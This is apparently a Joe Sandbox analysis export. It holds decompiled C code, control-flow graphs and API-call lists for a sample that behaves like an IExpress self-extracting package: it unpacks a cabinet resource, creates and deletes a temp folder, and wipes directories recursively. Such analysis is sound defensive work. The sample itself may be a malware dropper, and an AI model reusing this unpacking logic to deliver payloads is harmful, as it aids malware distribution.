                                                          0x010c4ff9
                                                          0x010c500d
                                                          0x010c5013
                                                          0x010c501a
                                                          0x010c5163
                                                          0x010c5163
                                                          0x010c5020
                                                          0x010c5027
                                                          0x010c5037
                                                          0x010c5051
                                                          0x010c5051
                                                          0x010c5057
                                                          0x010c505e
                                                          0x010c50a7
                                                          0x010c50ad
                                                          0x010c50b4
                                                          0x010c50e8
                                                          0x010c50e8
                                                          0x010c50ee
                                                          0x010c50ff
                                                          0x010c5104
                                                          0x010c5106
                                                          0x00000000
                                                          0x010c5106
                                                          0x010c50cd
                                                          0x010c50d3
                                                          0x010c50da
                                                          0x00000000
                                                          0x00000000
                                                          0x010c50dd
                                                          0x010c50e6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5060
                                                          0x010c5060
                                                          0x010c5070
                                                          0x010c5075
                                                          0x010c5107
                                                          0x010c5107
                                                          0x010c510e
                                                          0x010c5111
                                                          0x010c5117
                                                          0x010c5117
                                                          0x010c511f
                                                          0x010c5121
                                                          0x010c5127
                                                          0x010c5135
                                                          0x010c5135
                                                          0x010c5127
                                                          0x010c5141
                                                          0x010c5159
                                                          0x010c5159
                                                          0x00000000
                                                          0x010c515f

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 010C4FFE
                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 010C5006
                                                          • LockResource.KERNEL32(00000000), ref: 010C500D
                                                          • GetDlgItem.USER32(00000000,00000842), ref: 010C5030
                                                          • ShowWindow.USER32(00000000), ref: 010C5037
                                                          • GetDlgItem.USER32(00000841,00000005), ref: 010C504A
                                                          • ShowWindow.USER32(00000000), ref: 010C5051
                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 010C5111
                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 010C5159
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 8f44ee0308ec89386dced5dc9c565b748628a9e0945d52f87502ed3bbf12dec6
                                                          • Instruction ID: 91ddcd46e560a0c36789685a5a7206561d0659ab452dcd365d2f503b579b2db0
                                                          • Opcode Fuzzy Hash: 8f44ee0308ec89386dced5dc9c565b748628a9e0945d52f87502ed3bbf12dec6
                                                          • Instruction Fuzzy Hash: AE31E6B4740215AFE7305B6AAC9EF6F3A9CB784F85F04405DBDC1D6189E6BE98008F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 406 10c2f1d-10c2f3d 407 10c2f6c-10c2f73 call 10c5164 406->407 408 10c2f3f-10c2f46 406->408 417 10c2f79-10c2f80 call 10c55a0 407->417 418 10c3041 407->418 409 10c2f5f-10c2f66 call 10c3a3f 408->409 410 10c2f48 call 10c51e5 408->410 409->407 409->418 415 10c2f4d-10c2f4f 410->415 415->418 420 10c2f55-10c2f5d 415->420 417->418 425 10c2f86-10c2fbe GetSystemDirectoryA call 10c658a LoadLibraryA 417->425 419 10c3043-10c3053 call 10c6ce0 418->419 420->407 420->409 428 10c2ff7-10c3004 FreeLibrary 425->428 429 10c2fc0-10c2fd4 GetProcAddress 425->429 431 10c3006-10c300c 428->431 432 10c3017-10c3024 SetCurrentDirectoryA 428->432 429->428 430 10c2fd6-10c2fee DecryptFileA 429->430 430->428 441 10c2ff0-10c2ff5 430->441 431->432 433 10c300e call 10c621e 431->433 434 10c3054-10c305a 432->434 435 10c3026-10c303c call 10c44b9 call 10c6285 432->435 445 10c3013-10c3015 433->445 437 10c305c call 10c3b26 434->437 438 10c3065-10c306c 434->438 435->418 447 10c3061-10c3063 437->447 443 10c307c-10c3089 438->443 444 10c306e-10c3075 call 10c256d 438->444 441->428 449 10c308b-10c3091 443->449 450 10c30a1-10c30a9 443->450 455 10c307a 444->455 445->418 445->432 447->418 447->438 449->450 456 10c3093 call 10c3ba2 449->456 453 10c30ab-10c30ad 450->453 454 10c30b4-10c30b7 450->454 453->454 458 10c30af call 10c4169 453->458 454->419 455->443 459 10c3098-10c309a 456->459 458->454 459->418 461 10c309c 459->461 461->450
                                                          C-Code - Quality: 82%
                                                          			E010C2F1D(void* __ecx, int __edx) {
                                                          				signed int _v8;
                                                          				char _v272;
                                                          				_Unknown_base(*)()* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t9;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				void* _t14;
                                                          				int _t21;
                                                          				signed int _t22;
                                                          				signed int _t25;
                                                          				intOrPtr* _t26;
                                                          				signed int _t27;
                                                          				void* _t30;
                                                          				_Unknown_base(*)()* _t31;
                                                          				void* _t34;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr _t41;
                                                          				intOrPtr* _t44;
                                                          				signed int _t46;
                                                          				int _t47;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          
                                                          				_t43 = __edx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t46;
                                                          				if( *0x10c8a38 != 0) {
                                                          					L5:
                                                          					_t11 = E010C5164(_t52);
                                                          					_t53 = _t11;
                                                          					if(_t11 == 0) {
                                                          						L16:
                                                          						_t12 = 0;
                                                          						L17:
                                                          						return E010C6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                          					}
                                                          					_t14 = E010C55A0(_t53); // executed
                                                          					if(_t14 == 0) {
                                                          						goto L16;
                                                          					} else {
                                                          						_t45 = 0x105;
                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                          						_t43 = 0x105;
                                                          						_t40 =  &_v272;
                                                          						E010C658A( &_v272, 0x105, "advapi32.dll");
                                                          						_t36 = LoadLibraryA( &_v272);
                                                          						_t44 = 0;
                                                          						if(_t36 != 0) {
                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                          							_v276 = _t31;
                                                          							if(_t31 != 0) {
                                                          								_t45 = _t47;
                                                          								_t40 = _t31;
                                                          								 *0x10ca288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                          								_v276();
                                                          								if(_t47 != _t47) {
                                                          									_t40 = 4;
                                                          									asm("int 0x29");
                                                          								}
                                                          							}
                                                          						}
                                                          						FreeLibrary(_t36);
                                                          						_t58 =  *0x10c8a24 - _t44; // 0x0
                                                          						if(_t58 != 0) {
                                                          							L14:
                                                          							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                          							if(_t21 != 0) {
                                                          								__eflags =  *0x10c8a2c - _t44; // 0x0
                                                          								if(__eflags != 0) {
                                                          									L20:
                                                          									__eflags =  *0x10c8d48 & 0x000000c0;
                                                          									if(( *0x10c8d48 & 0x000000c0) == 0) {
                                                          										_t41 =  *0x10c9a40; // 0x3, executed
                                                          										_t26 = E010C256D(_t41); // executed
                                                          										_t44 = _t26;
                                                          									}
                                                          									_t22 =  *0x10c8a24; // 0x0
                                                          									 *0x10c9a44 = _t44;
                                                          									__eflags = _t22;
                                                          									if(_t22 != 0) {
                                                          										L26:
                                                          										__eflags =  *0x10c8a38;
                                                          										if( *0x10c8a38 == 0) {
                                                          											__eflags = _t22;
                                                          											if(__eflags == 0) {
                                                          												E010C4169(__eflags);
                                                          											}
                                                          										}
                                                          										_t12 = 1;
                                                          										goto L17;
                                                          									} else {
                                                          										__eflags =  *0x10c9a30 - _t22; // 0x0
                                                          										if(__eflags != 0) {
                                                          											goto L26;
                                                          										}
                                                          										_t25 = E010C3BA2(); // executed
                                                          										__eflags = _t25;
                                                          										if(_t25 == 0) {
                                                          											goto L16;
                                                          										}
                                                          										_t22 =  *0x10c8a24; // 0x0
                                                          										goto L26;
                                                          									}
                                                          								}
                                                          								_t27 = E010C3B26(_t40, _t44);
                                                          								__eflags = _t27;
                                                          								if(_t27 == 0) {
                                                          									goto L16;
                                                          								}
                                                          								goto L20;
                                                          							}
                                                          							_t43 = 0x4bc;
                                                          							E010C44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                          							 *0x10c9124 = E010C6285();
                                                          							goto L16;
                                                          						}
                                                          						_t59 =  *0x10c9a30 - _t44; // 0x0
                                                          						if(_t59 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						_t30 = E010C621E(); // executed
                                                          						if(_t30 == 0) {
                                                          							goto L16;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				_t49 =  *0x10c8a24;
                                                          				if( *0x10c8a24 != 0) {
                                                          					L4:
                                                          					_t34 = E010C3A3F(_t51);
                                                          					_t52 = _t34;
                                                          					if(_t34 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          				if(E010C51E5(_t49) == 0) {
                                                          					goto L16;
                                                          				}
                                                          				_t51 =  *0x10c8a38;
                                                          				if( *0x10c8a38 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				goto L4;
                                                          			}




























                                                          0x010c2f1d
                                                          0x010c2f28
                                                          0x010c2f2f
                                                          0x010c2f3d
                                                          0x010c2f6c
                                                          0x010c2f6c
                                                          0x010c2f71
                                                          0x010c2f73
                                                          0x010c3041
                                                          0x010c3041
                                                          0x010c3043
                                                          0x010c3053
                                                          0x010c3053
                                                          0x010c2f79
                                                          0x010c2f80
                                                          0x00000000
                                                          0x010c2f86
                                                          0x010c2f86
                                                          0x010c2f93
                                                          0x010c2f9e
                                                          0x010c2fa0
                                                          0x010c2fa6
                                                          0x010c2fb8
                                                          0x010c2fba
                                                          0x010c2fbe
                                                          0x010c2fc6
                                                          0x010c2fcc
                                                          0x010c2fd4
                                                          0x010c2fd6
                                                          0x010c2fd8
                                                          0x010c2fe0
                                                          0x010c2fe6
                                                          0x010c2fee
                                                          0x010c2ff0
                                                          0x010c2ff5
                                                          0x010c2ff5
                                                          0x010c2fee
                                                          0x010c2fd4
                                                          0x010c2ff8
                                                          0x010c2ffe
                                                          0x010c3004
                                                          0x010c3017
                                                          0x010c301c
                                                          0x010c3024
                                                          0x010c3054
                                                          0x010c305a
                                                          0x010c3065
                                                          0x010c3065
                                                          0x010c306c
                                                          0x010c306e
                                                          0x010c3075
                                                          0x010c307a
                                                          0x010c307a
                                                          0x010c307c
                                                          0x010c3081
                                                          0x010c3087
                                                          0x010c3089
                                                          0x010c30a1
                                                          0x010c30a1
                                                          0x010c30a9
                                                          0x010c30ab
                                                          0x010c30ad
                                                          0x010c30af
                                                          0x010c30af
                                                          0x010c30ad
                                                          0x010c30b6
                                                          0x00000000
                                                          0x010c308b
                                                          0x010c308b
                                                          0x010c3091
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3093
                                                          0x010c3098
                                                          0x010c309a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c309c
                                                          0x00000000
                                                          0x010c309c
                                                          0x010c3089
                                                          0x010c305c
                                                          0x010c3061
                                                          0x010c3063
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3063
                                                          0x010c302b
                                                          0x010c3032
                                                          0x010c303c
                                                          0x00000000
                                                          0x010c303c
                                                          0x010c3006
                                                          0x010c300c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c300e
                                                          0x010c3015
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3015
                                                          0x010c2f80
                                                          0x010c2f3f
                                                          0x010c2f46
                                                          0x010c2f5f
                                                          0x010c2f5f
                                                          0x010c2f64
                                                          0x010c2f66
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2f66
                                                          0x010c2f4f
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2f55
                                                          0x010c2f5d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2F93
                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010C2FB2
                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010C2FC6
                                                          • DecryptFileA.ADVAPI32 ref: 010C2FE6
                                                          • FreeLibrary.KERNEL32(00000000), ref: 010C2FF8
                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C301C
                                                            • Part of subcall function 010C51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F4D,?,00000002,00000000), ref: 010C5201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 2126469477-3123416969
                                                          • Opcode ID: a8bec83dea27d3997e8dc73512494397af052bc913a29364a2bddc1ea822983d
                                                          • Instruction ID: d7b598bbf8f4fa917c73a95d7d226fb348254c5049ef998bb5c6d1d24b834084
                                                          • Opcode Fuzzy Hash: a8bec83dea27d3997e8dc73512494397af052bc913a29364a2bddc1ea822983d
                                                          • Instruction Fuzzy Hash: C941EC316102068EEB71AB7D9C5469E37E4FB54F44F2080ADBEC1C6545EB79C580CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 478 10c5467-10c5484 479 10c551c-10c5528 call 10c1680 478->479 480 10c548a-10c5490 call 10c53a1 478->480 484 10c552d-10c5539 call 10c58c8 479->484 483 10c5495-10c5497 480->483 485 10c549d-10c54c0 call 10c1781 483->485 486 10c5581-10c5583 483->486 493 10c554d-10c5552 484->493 494 10c553b-10c5545 CreateDirectoryA 484->494 495 10c550c-10c551a call 10c658a 485->495 496 10c54c2-10c54d8 GetSystemInfo 485->496 489 10c558d-10c559d call 10c6ce0 486->489 500 10c5554-10c5557 call 10c597d 493->500 501 10c5585-10c558b 493->501 498 10c5577-10c557c call 10c6285 494->498 499 10c5547 494->499 495->484 504 10c54fe 496->504 505 10c54da-10c54dd 496->505 498->486 499->493 507 10c555c-10c555e 500->507 501->489 508 10c5503-10c5507 call 10c658a 504->508 511 10c54df-10c54e2 505->511 512 10c54f7-10c54fc 505->512 507->501 513 10c5560-10c5566 507->513 508->495 515 10c54e4-10c54e7 511->515 516 10c54f0-10c54f5 511->516 512->508 513->486 517 10c5568-10c5575 RemoveDirectoryA 513->517 515->495 518 10c54e9-10c54ee 515->518 516->508 517->486 518->508
                                                          C-Code - Quality: 75%
                                                          			E010C5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _SYSTEM_INFO _v304;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t10;
                                                          				void* _t13;
                                                          				intOrPtr _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				signed int _t26;
                                                          				void* _t28;
                                                          				void* _t29;
                                                          				CHAR* _t48;
                                                          				signed int _t49;
                                                          				intOrPtr _t61;
                                                          
                                                          				_t10 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t10 ^ _t49;
                                                          				_push(__ecx);
                                                          				if(__edx == 0) {
                                                          					_t48 = 0x10c91e4;
                                                          					_t42 = 0x104;
                                                          					E010C1680(0x10c91e4, 0x104);
                                                          					L14:
                                                          					_t13 = E010C58C8(_t48); // executed
                                                          					if(_t13 != 0) {
                                                          						L17:
                                                          						_t42 = _a4;
                                                          						if(_a4 == 0) {
                                                          							L23:
                                                          							 *0x10c9124 = 0;
                                                          							_t14 = 1;
                                                          							L24:
                                                          							return E010C6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                          						}
                                                          						_t16 = E010C597D(_t48, _t42, 1, 0); // executed
                                                          						if(_t16 != 0) {
                                                          							goto L23;
                                                          						}
                                                          						_t61 =  *0x10c8a20; // 0x0
                                                          						if(_t61 != 0) {
                                                          							 *0x10c8a20 = 0;
                                                          							RemoveDirectoryA(_t48);
                                                          						}
                                                          						L22:
                                                          						_t14 = 0;
                                                          						goto L24;
                                                          					}
                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                          						 *0x10c9124 = E010C6285();
                                                          						goto L22;
                                                          					}
                                                          					 *0x10c8a20 = 1;
                                                          					goto L17;
                                                          				}
                                                          				_t42 =  &_v268;
                                                          				_t20 = E010C53A1(__ecx,  &_v268); // executed
                                                          				if(_t20 == 0) {
                                                          					goto L22;
                                                          				}
                                                          				_push(__ecx);
                                                          				_t48 = 0x10c91e4;
                                                          				E010C1781(0x10c91e4, 0x104, __ecx,  &_v268);
                                                          				if(( *0x10c9a34 & 0x00000020) == 0) {
                                                          					L12:
                                                          					_t42 = 0x104;
                                                          					E010C658A(_t48, 0x104, 0x10c1140);
                                                          					goto L14;
                                                          				}
                                                          				GetSystemInfo( &_v304);
                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                          				if(_t26 == 0) {
                                                          					_push("i386");
                                                          					L11:
                                                          					E010C658A(_t48, 0x104);
                                                          					goto L12;
                                                          				}
                                                          				_t28 = _t26 - 1;
                                                          				if(_t28 == 0) {
                                                          					_push("mips");
                                                          					goto L11;
                                                          				}
                                                          				_t29 = _t28 - 1;
                                                          				if(_t29 == 0) {
                                                          					_push("alpha");
                                                          					goto L11;
                                                          				}
                                                          				if(_t29 != 1) {
                                                          					goto L12;
                                                          				}
                                                          				_push("ppc");
                                                          				goto L11;
                                                          			}




















                                                          0x010c5472
                                                          0x010c5479
                                                          0x010c5481
                                                          0x010c5484
                                                          0x010c551c
                                                          0x010c5521
                                                          0x010c5528
                                                          0x010c552d
                                                          0x010c552f
                                                          0x010c5539
                                                          0x010c554d
                                                          0x010c554d
                                                          0x010c5552
                                                          0x010c5585
                                                          0x010c5585
                                                          0x010c558b
                                                          0x010c558d
                                                          0x010c559d
                                                          0x010c559d
                                                          0x010c5557
                                                          0x010c555e
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5560
                                                          0x010c5566
                                                          0x010c5569
                                                          0x010c556f
                                                          0x010c556f
                                                          0x010c5581
                                                          0x010c5581
                                                          0x00000000
                                                          0x010c5581
                                                          0x010c5545
                                                          0x010c557c
                                                          0x00000000
                                                          0x010c557c
                                                          0x010c5547
                                                          0x00000000
                                                          0x010c5547
                                                          0x010c548a
                                                          0x010c5490
                                                          0x010c5497
                                                          0x00000000
                                                          0x00000000
                                                          0x010c549d
                                                          0x010c54ab
                                                          0x010c54b4
                                                          0x010c54c0
                                                          0x010c550c
                                                          0x010c5511
                                                          0x010c5515
                                                          0x00000000
                                                          0x010c5515
                                                          0x010c54c9
                                                          0x010c54d6
                                                          0x010c54d8
                                                          0x010c54fe
                                                          0x010c5503
                                                          0x010c5507
                                                          0x00000000
                                                          0x010c5507
                                                          0x010c54da
                                                          0x010c54dd
                                                          0x010c54f7
                                                          0x00000000
                                                          0x010c54f7
                                                          0x010c54df
                                                          0x010c54e2
                                                          0x010c54f0
                                                          0x00000000
                                                          0x010c54f0
                                                          0x010c54e7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c54e9
                                                          0x00000000

                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C54C9
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C553D
                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C556F
                                                            • Part of subcall function 010C53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C53FB
                                                            • Part of subcall function 010C53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5402
                                                            • Part of subcall function 010C53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C541F
                                                            • Part of subcall function 010C53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C542B
                                                            • Part of subcall function 010C53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5434
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-3703068183
                                                          • Opcode ID: c6a48293d58c7de5eed960e3595fd28b54449f37aa4bba8cca9c6eafdc5a334a
                                                          • Instruction ID: d726efb0abebb585e10b9bef779c2fce5dbdf75b38f4d0fd6c0434182d56045a
                                                          • Opcode Fuzzy Hash: c6a48293d58c7de5eed960e3595fd28b54449f37aa4bba8cca9c6eafdc5a334a
                                                          • Instruction Fuzzy Hash: 01316974B002059FDB209B2E9C549BF77DBABF5F44B04416EA9C1D3284DB75EA018F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E010C2390(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v276;
                                                          				char _v280;
                                                          				char _v284;
                                                          				struct _WIN32_FIND_DATAA _v596;
                                                          				struct _WIN32_FIND_DATAA _v604;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				int _t36;
                                                          				void* _t46;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				CHAR* _t65;
                                                          				void* _t66;
                                                          				signed int _t67;
                                                          				signed int _t69;
                                                          
                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                          				_t21 =  *0x10c8004; // 0x4b13cf70
                                                          				_t22 = _t21 ^ _t69;
                                                          				_v8 = _t21 ^ _t69;
                                                          				_t65 = __ecx;
                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                          					L10:
                                                          					_pop(_t62);
                                                          					_pop(_t66);
                                                          					_pop(_t46);
                                                          					return E010C6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                          				} else {
                                                          					E010C1680( &_v276, 0x104, __ecx);
                                                          					_t58 = 0x104;
                                                          					E010C16B3( &_v280, 0x104, "*");
                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                          					_t63 = _t22;
                                                          					if(_t63 == 0xffffffff) {
                                                          						goto L10;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          					do {
                                                          						L3:
                                                          						_t58 = 0x104;
                                                          						E010C1680( &_v276, 0x104, _t65);
                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                          							_t58 = 0x104;
                                                          							E010C16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                          							SetFileAttributesA( &_v280, 0x80);
                                                          							DeleteFileA( &_v280);
                                                          						} else {
                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                          								E010C16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                          								_t58 = 0x104;
                                                          								E010C658A( &_v280, 0x104, 0x10c1140);
                                                          								E010C2390( &_v284);
                                                          							}
                                                          						}
                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                          					} while (_t36 != 0);
                                                          					FindClose(_t63); // executed
                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                          					goto L10;
                                                          				}
                                                          			}





















                                                          0x010c2398
                                                          0x010c239e
                                                          0x010c23a3
                                                          0x010c23a5
                                                          0x010c23ae
                                                          0x010c23b3
                                                          0x010c24cb
                                                          0x010c24d2
                                                          0x010c24d3
                                                          0x010c24d4
                                                          0x010c24df
                                                          0x010c23c2
                                                          0x010c23d1
                                                          0x010c23db
                                                          0x010c23e4
                                                          0x010c23f6
                                                          0x010c23fc
                                                          0x010c2401
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2407
                                                          0x010c2407
                                                          0x010c2408
                                                          0x010c2411
                                                          0x010c241f
                                                          0x010c247a
                                                          0x010c2483
                                                          0x010c2495
                                                          0x010c24a3
                                                          0x010c2421
                                                          0x010c242f
                                                          0x010c2453
                                                          0x010c245d
                                                          0x010c2466
                                                          0x010c2472
                                                          0x010c2472
                                                          0x010c242f
                                                          0x010c24af
                                                          0x010c24b5
                                                          0x010c24be
                                                          0x010c24c5
                                                          0x00000000
                                                          0x010c24c5

                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,010C8A3A,010C11F4,010C8A3A,00000000,?,?), ref: 010C23F6
                                                          • lstrcmpA.KERNEL32(?,010C11F8), ref: 010C2427
                                                          • lstrcmpA.KERNEL32(?,010C11FC), ref: 010C243B
                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010C2495
                                                          • DeleteFileA.KERNEL32(?), ref: 010C24A3
                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010C24AF
                                                          • FindClose.KERNELBASE(00000000), ref: 010C24BE
                                                          • RemoveDirectoryA.KERNELBASE(010C8A3A), ref: 010C24C5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
